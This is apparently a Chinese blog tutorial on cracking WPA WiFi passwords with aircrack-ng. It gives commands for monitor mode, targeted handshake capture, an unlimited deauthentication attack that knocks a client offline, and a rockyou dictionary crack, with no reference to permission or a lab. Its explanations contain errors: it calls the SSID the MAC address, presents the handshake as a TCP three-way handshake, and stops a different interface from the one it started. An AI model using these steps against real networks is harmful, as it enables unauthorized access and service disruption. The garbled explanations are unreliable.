0%

wifi破解

查看本机的网卡
1
iwconfig

获取本机网卡名称 wlp2s0
打开网络监听

1
airmon-ng start wlp2s0

输入iwconfig命令查看网卡信息, wlp2s0mon网卡名加了mon则表示成功

开始扫描WiFi

1
airodump-ng wlp2s0mon

SSID为wifi的MAC地址
PWR为信号强弱程度 -数值越小信号越强
DATA为数据量,越大使用的人就越多
CH为信道频率(频道)
ESSID为wifi的名称,中文可能会有乱码

接着输入airodump-ng –bssid BSSID -c 信道频率 -w 抓包存储的路径 wlp2s0mon

1
airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w ./ wlp2s0mon

数据包已经正在抓取
如果抓取不到数据,新建一个终端:键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名

1
aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlp2s0mon

(0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,
数据包里面的密码是哈希加密的,哈希加密只能正向)

出现WPA handshake时,表示抓包成功
两个终端都按Ctrl+c停止,不然那边会一直断网的
cd打开抓包的目录,ls列出来,就看到我们抓到的数据包
解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz

1
gzip -d/usr/share/wordlists/rockyou.txt.gz

键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破

1
aircrack-ng -w rockyou.txt wifi-0.1.cap

最后关闭网络监听

1
airmon-ng stop wlp3s0mon